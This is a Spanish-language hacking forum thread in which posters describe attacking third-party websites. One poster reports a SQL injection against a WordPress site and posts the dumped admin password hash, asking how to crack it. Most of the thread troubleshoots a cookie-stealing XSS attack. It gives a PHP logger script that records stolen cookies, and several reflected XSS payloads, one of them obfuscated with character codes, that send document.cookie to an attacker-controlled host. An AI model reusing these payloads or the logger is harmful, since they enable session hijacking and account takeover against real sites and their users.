Saludos a todos mi pregunta es algo sencilla no se si va en esta parte del foro pero aqui va hice un ataque de sql injection a una pagina web de wordpress como resultado tengo esto:

admin:$P$BvlIB.luCxq7KHJI5Xom4nEZhqGDgq/


Alguien me podria decir que tipo de encriptacion esta y si hay algun tools ya que al principio pense que era sha o des pero no es asi.

Gracias

yo lo prove concatenando el la url + el cookie
de este manera

"miurl.com"+document.cookie;
y despues probe

"miurl.com"%2bdocument.cookie; y asi si funciona!
es por el magic quote. gracias no mantenemos en conctato!

Ya mucha gracias lo hice con unicode para la url y me funciono perfectamente jijiji

"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 115, 99, 114, 105, 112, 116, 62))</script>


esto fue lo que puse y no salio nada

No funciona tio

con el code tratat de agregarle el + document.cookie; al ejemplo que me diste a ver si te junciona.

Gracias

Solo la puse asi para que ustedes trataran!!!

chmod 777 c.php
PHP SCRIPT:

<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

XSS BUG URL:

http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script>

LOG.TXT:

pero si pongo

http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script>

LOG.TXT:
: x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400

Gracias!

Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.

http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.

Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir  
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.